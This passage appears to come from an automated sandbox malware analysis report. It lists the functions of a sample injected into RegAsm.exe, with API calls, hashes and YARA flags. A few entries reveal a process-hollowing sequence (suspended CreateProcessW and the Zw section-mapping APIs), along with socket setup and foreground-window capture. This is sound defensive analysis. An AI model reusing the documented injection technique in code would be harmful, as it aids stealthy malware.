                                                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID: @
                                                                                • API String ID: 1890195054-2766056989
                                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                • _free.LIBCMT ref: 0044F050
                                                                                • _free.LIBCMT ref: 0044F086
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast_abort
                                                                                • String ID:
                                                                                • API String ID: 2991157371-0
                                                                                • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                • _free.LIBCMT ref: 10006CD7
                                                                                • _free.LIBCMT ref: 10006D0D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast_abort
                                                                                • String ID:
                                                                                • API String ID: 2991157371-0
                                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2279764990-0
                                                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00446227
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocAllocate_free
                                                                                • String ID:
                                                                                • API String ID: 2447670028-0
                                                                                • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventStartupsocket
                                                                                • String ID:
                                                                                • API String ID: 1953588214-0
                                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                • String ID:
                                                                                • API String ID: 3750050125-0
                                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ForegroundText
                                                                                • String ID:
                                                                                • API String ID: 29597999-0
                                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                • String ID:
                                                                                • API String ID: 806969131-0
                                                                                • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                • String ID:
                                                                                • API String ID: 806969131-0
                                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                • String ID:
                                                                                • API String ID: 2948481953-0
                                                                                • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: __crt_fast_encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 3768137683-0
                                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm
                                                                                • String ID:
                                                                                • API String ID: 65215352-0
                                                                                • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID:
                                                                                • API String ID: 724789610-0
                                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
